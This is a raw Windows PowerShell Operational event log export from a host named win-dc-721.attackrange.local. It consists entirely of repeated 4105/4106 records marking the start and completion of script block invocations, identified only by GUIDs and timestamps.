User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478005
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478004
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478003
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478002
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478001
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478000
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477999
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477998
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477997
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477996
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477995
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477994
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477993
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477992
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477991
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477990
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477989
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477988
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477987
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477986
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477985
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477984
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477983
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477982
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477981
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477980
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477979
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477978
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477976
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477975
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477974
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477973
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477972
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477971
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477970
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477969
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477968
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477967
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477966
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477965
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477964
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477963
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477962
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477961
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477960
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477959
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477958
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477957
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477956
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477955
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477954
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477952
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477950
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
